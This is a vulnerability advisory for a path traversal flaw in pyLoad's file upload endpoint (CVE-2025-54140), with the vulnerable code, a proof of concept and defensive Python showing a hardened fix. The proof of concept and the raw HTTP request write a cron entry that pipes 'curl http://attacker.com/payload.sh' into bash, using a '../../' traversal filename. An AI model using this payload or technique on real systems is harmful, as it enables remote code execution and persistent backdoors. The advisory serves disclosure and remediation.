CVE-2025-54140 – pyload-ng
Package
Manager: pip
Name: pyload-ng
Vulnerable Version: =0.5.0b3.dev89 || >=0.5.0b3.dev89 <0.5.0b3.dev90
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS: 0.00266 (percentile 0.49826)
Details
`pyLoad` has a Path Traversal Vulnerability in the `json/upload` Endpoint that allows Arbitrary File Write

## Summary

An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` web UI. By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to:

* **Remote Code Execution (RCE)**
* **Local Privilege Escalation**
* **System-wide compromise**
* **Persistence and backdoors**

---

### Vulnerable Code

File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)

```python
# Excerpt of the affected handler; `json_blueprint`, `api`, `os` and Flask's
# `request` come from the surrounding module.
@json_blueprint.route("/upload", methods=["POST"])
def upload():
    # Destination directory is the configured storage folder.
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        # file.filename is taken verbatim from the client's Content-Disposition header.
        file_path = os.path.join(dir_path, "tmp_" + file.filename)
        file.save(file_path)
```

**Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences. Note that the `tmp_` prefix is concatenated onto the first path component of the supplied name, so a name beginning with `../` yields a first component of `tmp_..`; verify the write against a harmless target on the test instance before relying on a specific destination.

### Proof of Concept

(The affected package in this record is `pyload-ng` 0.5.0b3.dev89; the tag and pin below are as given in the advisory's PoC.)

1. **Clone and install pyLoad from source:**

   ```bash
   git clone https://github.com/pyload/pyload
   cd pyload
   git checkout 0.4.20
   python -m pip install -e .
   pyload --userdir=/tmp/pyload
   ```

   **Or install via pip (PyPI) in a virtualenv:**

   ```bash
   python -m venv pyload-env
   source pyload-env/bin/activate
   pip install pyload==0.4.20
   pyload
   ```

2. **Log in and obtain a session cookie**

   ```bash
   curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
     -d "username=admin&password=admin"
   ```

3. **Create a malicious cron payload**

   ```bash
   echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
   ```

4. **Upload the file with a path traversal filename**

   ```bash
   curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
     -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
   ```

5. On the next cron tick, the payload is fetched and executed. This step assumes the pyLoad process runs with enough privilege to write `/etc/cron.d` (cron also ignores entries there that are not owned by root or are group/world writable).

### BurpSuite HTTP Request

```
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
```
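The following is an added example, not pyLoad's code nor its published fix: it reproduces the unpatched path computation from the handler above, applies the lexical containment check the handler lacks, and shows a hardened variant beside it. `STORAGE_DIR` is a constructed stand-in for the configured storage folder, and the sample filenames are constructed (one benign name plus the advisory's PoC name as a crafted `Content-Disposition` would deliver it). It also shows concretely that the `tmp_` prefix turns the PoC's leading `../` into a `tmp_..` component, which the containment check still flags because `..` segments collapse the path to `/etc/cron.d/pyload_backdoor`.

```python
import os

# Constructed stand-in for api.get_config_value("general", "storage_folder").
STORAGE_DIR = "/srv/pyload/storage"


def vulnerable_upload_path(storage_dir: str, filename: str) -> str:
    """Reproduce the unpatched computation: a fixed prefix glued onto the
    client-supplied filename, joined under the storage folder with no checks."""
    return os.path.join(storage_dir, "tmp_" + filename)


def escapes_storage(storage_dir: str, path: str) -> bool:
    """Lexical containment check missing from the original handler: after
    collapsing '..' segments, does `path` still live under `storage_dir`?
    Symlinks inside the storage folder are a separate concern; a production
    check would additionally os.path.realpath() both sides."""
    root = os.path.normpath(os.path.abspath(storage_dir))
    target = os.path.normpath(os.path.abspath(path))
    return os.path.commonpath([root, target]) != root


def hardened_upload_path(storage_dir: str, filename: str) -> str:
    """Hardened variant: keep only the last segment of the client-supplied
    name (the same idea as werkzeug.utils.secure_filename, without the
    dependency), reject degenerate names, and refuse anything that still
    escapes the storage folder once the prefix is applied."""
    # Clients may send either separator; treat both as path separators.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", "..") or "\x00" in base:
        raise ValueError(f"rejected upload filename {filename!r}")
    candidate = os.path.join(storage_dir, "tmp_" + base)
    if escapes_storage(storage_dir, candidate):
        raise ValueError(f"upload path escapes storage folder: {candidate}")
    return candidate


# Constructed sample names: a benign upload, the advisory's PoC name, a
# backslash variant, and a name with no final segment at all.
SAMPLE_FILENAMES = [
    "links.txt",
    "../../../../etc/cron.d/pyload_backdoor",
    "..\\..\\Windows\\Temp\\x.bat",
    "../",
]


def audit(storage_dir: str = STORAGE_DIR, names=SAMPLE_FILENAMES):
    """For each name return (name, unpatched path, escapes storage?, hardened
    path or None when the hardened variant rejects the name)."""
    rows = []
    for name in names:
        raw = vulnerable_upload_path(storage_dir, name)
        try:
            safe = hardened_upload_path(storage_dir, name)
        except ValueError:
            safe = None
        rows.append((name, raw, escapes_storage(storage_dir, raw), safe))
    return rows


if __name__ == "__main__":
    for name, raw, escaped, safe in audit():
        print(f"{name!r}\n  unpatched: {raw}\n  escapes storage: {escaped}\n  hardened: {safe}")
```

The `escapes_storage` check is the minimal server-side fix: it should run on the final joined path, after any prefix or renaming, and before `file.save`. Stripping the name down to its last segment is the usual belt-and-braces companion so that a user-supplied name can never carry directory structure at all.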
Metadata
Created: 2025-07-21T21:16:06Z
Modified: 2025-07-23T13:37:09Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-xqpg-92fq-grfg/GHSA-xqpg-92fq-grfg.json
CWE IDs: ["CWE-22"]
Alternative ID: GHSA-xqpg-92fq-grfg
Finding: F063
Auto approve: 1